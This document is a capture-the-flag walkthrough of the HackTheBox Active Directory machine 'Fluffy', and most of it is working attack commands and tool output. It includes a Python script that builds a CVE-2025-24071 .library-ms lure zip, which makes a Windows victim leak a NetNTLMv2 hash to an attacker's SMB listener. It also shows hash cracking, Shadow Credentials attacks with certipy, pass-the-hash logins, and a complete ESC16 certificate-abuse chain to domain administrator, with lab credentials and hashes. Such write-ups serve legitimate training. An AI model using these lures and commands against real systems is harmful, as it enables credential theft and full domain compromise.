Fluffy starts with SMB share enumeration, which gives access to a PDF documenting vulnerabilities in the system. One of them, CVE-2025-24071, let us leak a NetNTLMv2 hash through a compressed .library-ms file. BloodHound analysis shows GenericAll and GenericWrite rights for one user, which allowed a Shadow Credentials attack against several service accounts and access over WinRM. Finally, the Certificate Authority was found to be vulnerable to ESC16, which was exploited to escalate privileges.
# Nmap 7.95 scan initiated Sun May 25 03:05:51 2025 as: /usr/lib/nmap/nmap --privileged -p53,139,389,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49681,49698,49706,49739 -sV -sC -oN nmap_scan 10.10.11.69
Nmap scan report for 10.10.11.69
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNS-SD-TCP:
| _services
| _dns-sd
| _udp
|_ local
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49739/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=5/25%Time=6832C165%P=x86_64-pc-linux-gnu%r(DNS-
SF:SD-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04
SF:_udp\x05local\0\0\x0c\0\x01");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-25T14:09:26
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h02m34s, deviation: 0s, median: 7h02m34s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 25 03:07:28 2025 -- 1 IP address (1 host up) scanned in 97.38 seconds
We add fluffy.htb and dc01.fluffy.htb to our /etc/hosts file. Note the clock skew of roughly 7 hours that nmap reports: Kerberos only tolerates a few minutes of skew, so Kerberos-based tooling may need the local clock synced to the DC (for example with ntpdate) before it works.
Service Access
The j.fleischman credentials give access to the SMB and LDAP services.
❯ ~/htb/tools/bloodhound-ce/bloodhound.py -u j.fleischman -p 'J0elTHEM4n1990!' -ns 10.10.11.69 -d fluffy.htb -c All --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 15S
INFO: Compressing output into 20250525110540_bloodhound.zip
❯
We create a wordlist based on the user list from BloodHound.
❯ exiftool Upgrade_Notice.pdf
ExifTool Version Number : 13.25
File Name : Upgrade_Notice.pdf
Directory : .
File Size : 170 kB
File Modification Date/Time : 2025:05:25 03:39:24-04:00
File Access Date/Time : 2025:05:29 02:57:05-04:00
File Inode Change Date/Time : 2025:05:25 03:39:24-04:00
File Permissions : -rw-rw-r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Page Count : 2
Tagged PDF : Yes
Language : en
Title : Upgrade Notice For IT Department
Create Date : 2025:05:17 07:22:32+00:00
Modify Date : 2025:05:17 07:22:32+00:00
Keywords : DAGnmrYlJoI, BAF-XVRpOno, 0
Author : p.agila
❯
In addition, the content lists vulnerabilities that must be patched.
It explains CVE-2025-24071: an NTLM hash can be leaked through a .library-ms file that contains the address of an SMB server (\\10.10.10.10\share\), packed inside a rar/zip archive.
The .library-ms file is an XML document; when the archive is extracted, Windows Explorer and the Windows Search indexer parse it and connect to the embedded UNC path without any user interaction, sending the user's NTLM authentication (a NetNTLMv2 challenge-response) to that server.
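To make the mechanism concrete, here is an added example of my own (not the 0x6rss PoC this writeup runs) that builds the same lure in memory and, for the defensive side, scans a zip for .library-ms members whose search location points at a remote host. The XML is the standard Windows library description the public PoC uses; the listener address 10.10.14.58 and the share name shared are placeholders.

```python
"""Added example, not the page's poc.py: build the CVE-2025-24071 lure
archive and scan an archive for .library-ms members that point at a
remote UNC share.

Assumed: the XML layout below is the standard Windows library
description used by the public PoC; 10.10.14.58 and "shared" are
placeholder listener/share values for this demonstration.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"

# <simpleLocation><url> is resolved by Explorer / Windows Search as soon as
# the extracted file is rendered, with no click, so a UNC path here makes
# the victim authenticate to the attacker's SMB listener.
LIBRARY_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{ns}">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{{7d49d726-3c21-4f05-99aa-fdc2c9474656}}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>{url}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def build_library_ms(unc_path: str) -> bytes:
    """Return a .library-ms document whose only search location is unc_path."""
    return LIBRARY_TEMPLATE.format(ns=LIBRARY_NS, url=escape(unc_path)).encode("utf-8")


def build_library_zip(member_name: str, url: str) -> bytes:
    """Zip a single .library-ms member pointing at url (in memory)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, build_library_ms(url))
    return buf.getvalue()


def build_lure_zip(file_name: str, listener_ip: str, share: str = "shared") -> bytes:
    """Same layout as the PoC's exploit.zip: extracting it makes Explorer
    resolve the UNC path and send the user's NetNTLMv2 response."""
    return build_library_zip(file_name + ".library-ms", "\\\\%s\\%s" % (listener_ip, share))


# Defensive side: the lure is easy to spot on a mail gateway or in EDR.
UNC_RE = re.compile(r"^\\\\([^\\/]+)(?:[\\/]|$)")


def remote_library_targets(zip_bytes: bytes) -> list:
    """Return (member, host) for each .library-ms in the archive whose <url>
    is a UNC path, i.e. a location outside the victim's own machine."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for member in zf.namelist():
            if not member.lower().endswith(".library-ms"):
                continue
            try:
                root = ET.fromstring(zf.read(member))
            except ET.ParseError:
                continue  # not well-formed XML: Explorer will not use it either
            for url in root.iter("{%s}url" % LIBRARY_NS):
                m = UNC_RE.match((url.text or "").strip())
                if m:
                    hits.append((member, m.group(1)))
    return hits


if __name__ == "__main__":
    lure = build_lure_zip("sckull", "10.10.14.58")
    with open("exploit.zip", "wb") as fh:
        fh.write(lure)
    print(remote_library_targets(lure))
```

The scanner deliberately keys on the XML namespace and the url element rather than on file names alone, because the lure works regardless of what the archive member is called as long as the extension is .library-ms.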
❯ git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
Cloning into 'CVE-2025-24071_PoC'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 18 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 6.30 KiB | 6.30 MiB/s, done.
Resolving deltas: 100% (4/4), done.
❯ cd CVE-2025-24071_PoC
❯ ll
.rw-rw-r-- kali kali 1003 B Thu May 29 03:12:56 2025 poc.py
.rw-rw-r-- kali kali 966 B Thu May 29 03:12:56 2025 README.md
❯
We run it, giving the file name and the IP address of our SMB listener.
❯ python poc.py
Enter your file name: sckull
Enter IP (EX: 192.168.1.162): 10.10.14.58
completed
❯
❯ ll
.rw-rw-r-- kali kali 320 B Thu May 29 03:14:15 2025 exploit.zip
.rw-rw-r-- kali kali 1003 B Thu May 29 03:12:56 2025 poc.py
.rw-rw-r-- kali kali 966 B Thu May 29 03:12:56 2025 README.md
❯
We run john with the rockyou.txt wordlist against the Responder capture file for 10.10.11.69 and recover the password in clear text.
❯ john SMB-NTLMv2-SSP-10.10.11.69.txt --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 21 password hashes with 21 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303 (p.agila)
21g 0:00:00:23 DONE (2025-05-25 11:54) 0.8947g/s 192496p/s 4042Kc/s 4042KC/s proquis..programmercomputer
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
❯
User - p.agila
The credentials give us access over SMB and LDAP.
One user of interest is ca_svc, since with it we could run Certipy and look for vulnerable templates.
GenericAll -> Service Accounts
We add p.agila to the Service Accounts group (GenericAll over the group lets us change its membership).
# add p.agila to service accounts
pth-net rpc group addmem "Service Accounts" p.agila -U "fluffy.htb/p.agila%prometheusx-303" -S 10.10.11.69
net rpc group members "Service Accounts" -U "fluffy.htb/p.agila%prometheusx-303" -S 10.10.11.69
Shadow Credentials
With GenericWrite over an account we can obtain its NT hash through a Shadow Credentials attack with certipy: it writes a key credential to the account's msDS-KeyCredentialLink, authenticates with the matching certificate via PKINIT, recovers the NT hash, and then restores the original attribute. We run this attack for the three users in the Service Accounts group, starting with ca_svc.
# GenericWrite on ca_svc, ldap_svc, winrm_svc
❯ certipy-ad shadow auto -u p.agila@fluffy.htb -p 'prometheusx-303' -account ca_svc
Certipy v5.0.0 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '1743faeb-8e62-89f4-20bc-7b0f7913cfe8'
[*] Adding Key Credential with device ID '1743faeb-8e62-89f4-20bc-7b0f7913cfe8' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '1743faeb-8e62-89f4-20bc-7b0f7913cfe8' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
❯
We obtained the hash of ldap_svc the same way.
❯ certipy-ad shadow auto -u p.agila@fluffy.htb -p 'prometheusx-303' -account ldap_svc
Certipy v5.0.0 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'ldap_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'ad7978f5-ef6c-d4fb-6154-5708e8f673ca'
[*] Adding Key Credential with device ID 'ad7978f5-ef6c-d4fb-6154-5708e8f673ca' to the Key Credentials for 'ldap_svc'
[*] Successfully added Key Credential with device ID 'ad7978f5-ef6c-d4fb-6154-5708e8f673ca' to the Key Credentials for 'ldap_svc'
[*] Authenticating as 'ldap_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ldap_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ldap_svc.ccache'
[*] Wrote credential cache to 'ldap_svc.ccache'
[*] Trying to retrieve NT hash for 'ldap_svc'
[*] Restoring the old Key Credentials for 'ldap_svc'
[*] Successfully restored the old Key Credentials for 'ldap_svc'
[*] NT hash for 'ldap_svc': 22151d74ba3de931a352cba1f9393a37
❯
And finally for winrm_svc.
❯ certipy-ad shadow auto -u p.agila@fluffy.htb -p 'prometheusx-303' -account winrm_svc
Certipy v5.0.0 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '8e224404-6043-2547-3758-c02d8e2ae20f'
[*] Adding Key Credential with device ID '8e224404-6043-2547-3758-c02d8e2ae20f' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '8e224404-6043-2547-3758-c02d8e2ae20f' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
❯
User - winrm_svc
winrm_svc can log in over the WinRM service; we use its NT hash with evil-winrm (pass-the-hash) and get a shell on the machine and the user.txt flag.
❯ evil-winrm -i fluffy.htb -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
fluffy\winrm_svc
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> dir ../Desktop
Directory: C:\Users\winrm_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/25/2025 8:18 AM 34 user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cat ../Desktop/user.txt
14a51cbc5bfc0388a9179b991f265390
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
Privesc
Using the ca_svc hash we run certipy with the search for vulnerable templates. The output shows that the Certificate Authority itself is vulnerable to ESC16 (no vulnerable templates are reported; the issue is in the CA configuration).
❯ certipy-ad find -vulnerable -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -no-pass -dc-ip 10.10.11.69 -ns 10.10.11.69 -target dc01.fluffy.htb -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0 CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
❯
ESC16 Exploit
We exploit ESC16, starting by checking its requirements. ESC16 means the CA has the szOID_NTDS_CA_SECURITY_EXT extension (1.3.6.1.4.1.311.25.2, shown under Disabled Extensions in the output above) disabled, so no certificate it issues carries the requester's SID and the DC falls back to mapping the certificate to an account by its UPN. For the attack, the attacking account needs GenericWrite over a victim account, and the victim must be able to enroll in any template of the vulnerable CA. Both hold here: winrm_svc and ldap_svc have GenericWrite over ca_svc, and ca_svc can enroll in the User template on the vulnerable CA. As the certipy remark notes, other prerequisites apply: the DC must not enforce strong certificate mapping fully, otherwise a certificate without the SID extension is rejected.
We start the exploitation by changing the UPN of ca_svc to administrator with the winrm_svc credentials.
With that done, we request a certificate from the User template as ca_svc. The issued certificate carries the UPN administrator and, as certipy points out, no object SID.
❯ certipy-ad req -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip '10.10.11.69' -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 19
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
❯
We then set the UPN of ca_svc back to its original value, so the account is left as we found it and the UPN administrator no longer collides.
Finally we authenticate with the requested certificate: the KDC maps the UPN administrator to the Administrator account, and certipy recovers its NT hash.
❯ certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
❯
Full list of commands for the ESC16 attack, in order.
# check the UPN of the victim user (we have GenericWrite over it)
certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -user 'ca_svc' read
# update the UPN of the victim
certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
# request a certificate as the victim from any template on the vulnerable CA
certipy-ad req -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip '10.10.11.69' -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
# revert the UPN of the victim
certipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
# authenticate with the requested certificate
certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Shell
We use the administrator hash over WinRM, getting a shell and the root.txt flag.
❯ evil-winrm -i fluffy.htb -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
fluffy\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
d7c989c36f239695ee0649aa6c6e49d2
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Dump Hashes
We dump the domain hashes with impacket-secretsdump.